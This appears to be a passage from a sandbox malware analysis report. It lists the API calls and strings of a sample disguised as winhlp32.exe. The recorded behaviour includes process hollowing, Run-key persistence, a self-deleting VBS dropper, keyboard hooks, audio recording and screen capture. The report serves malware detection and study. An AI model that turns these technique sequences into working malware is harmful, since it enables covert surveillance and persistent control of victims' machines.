                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                    • DeleteDC.GDI32(?), ref: 0041917C
                                    • DeleteDC.GDI32(00000000), ref: 0041917F
                                    • DeleteObject.GDI32(00000000), ref: 00419182
                                    • GlobalFree.KERNEL32(?), ref: 0041918D
                                    • DeleteObject.GDI32(00000000), ref: 00419241
                                    • GlobalFree.KERNEL32(?), ref: 00419248
                                    • DeleteDC.GDI32(?), ref: 00419258
                                    • DeleteDC.GDI32(00000000), ref: 00419263
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                    • String ID: DISPLAY
                                    • API String ID: 479521175-865373369
                                    • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                    • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                    • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                    • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                    • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                    • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                    • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                    • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                    • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                    • ResumeThread.KERNEL32(?), ref: 00418435
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                    • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                    • GetLastError.KERNEL32 ref: 0041847A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                    • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                    • API String ID: 4188446516-3035715614
                                    • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                    • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                    • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                    • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                    • ExitProcess.KERNEL32 ref: 0040D7D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-332907002
                                    • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                    • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                    • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                    • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                      • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                      • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                      • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B8D5
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                    • ExitProcess.KERNEL32 ref: 0040D419
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                    • API String ID: 3797177996-2557013105
                                    • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                    • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                    • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                    • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                    • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                    • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                    • GetCurrentProcessId.KERNEL32 ref: 00412541
                                    • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                    • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                    • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                      • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                    • Sleep.KERNEL32(000001F4), ref: 00412682
                                    • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                    • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                    • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                    • String ID: .exe$8SG$WDH$exepath$open$temp_
                                    • API String ID: 2649220323-436679193
                                    • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                    • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                    • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                    • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                    • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                    • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                    • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                    • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                    • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                    • SetEvent.KERNEL32 ref: 0041B219
                                    • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                    • CloseHandle.KERNEL32 ref: 0041B23A
                                    • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                    • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                    • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                    • API String ID: 738084811-2094122233
                                    • Opcode ID: c42a5703fedf08c3cbbd1e5038eee64118d9e3bd0f02047e83a30d8489e39581
                                    • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                    • Opcode Fuzzy Hash: c42a5703fedf08c3cbbd1e5038eee64118d9e3bd0f02047e83a30d8489e39581
                                    • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                    • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                    • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                    • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                    • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                    • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Write$Create
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1602526932-4212202414
                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\winhlp32.exe,00000001,0040764D,C:\Windows\winhlp32.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: C:\Windows\winhlp32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                    • API String ID: 1646373207-2557295206
                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 0040CE07
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                    • CopyFileW.KERNEL32(C:\Windows\winhlp32.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                    • _wcslen.LIBCMT ref: 0040CEE6
                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                    • CopyFileW.KERNEL32(C:\Windows\winhlp32.exe,00000000,00000000), ref: 0040CF84
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                    • _wcslen.LIBCMT ref: 0040CFC6
                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                    • ExitProcess.KERNEL32 ref: 0040D062
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                    • String ID: 6$C:\Windows\winhlp32.exe$del$open
                                    • API String ID: 1579085052-621878215
                                    • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                    • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                    • _wcslen.LIBCMT ref: 0041C13B
                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                    • GetLastError.KERNEL32 ref: 0041C173
                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                    • String ID: ?
                                    • API String ID: 3941738427-1684325040
                                    • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                    • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$EnvironmentVariable$_wcschr
                                    • String ID:
                                    • API String ID: 3899193279-0
                                    • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                    • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                      • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                      • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                    • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                    • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                    • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                    • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                    • Sleep.KERNEL32(00000064), ref: 00412E94
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                    • String ID: /stext "$0TG$0TG$NG$NG
                                    • API String ID: 1223786279-2576077980
                                    • Opcode ID: 6e29699190e6674568e17b62b3cbc9041562105630a2a1f1bbf1f9ebd5142883
                                    • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                    • Opcode Fuzzy Hash: 6e29699190e6674568e17b62b3cbc9041562105630a2a1f1bbf1f9ebd5142883
                                    • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                    • API String ID: 2490988753-744132762
                                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
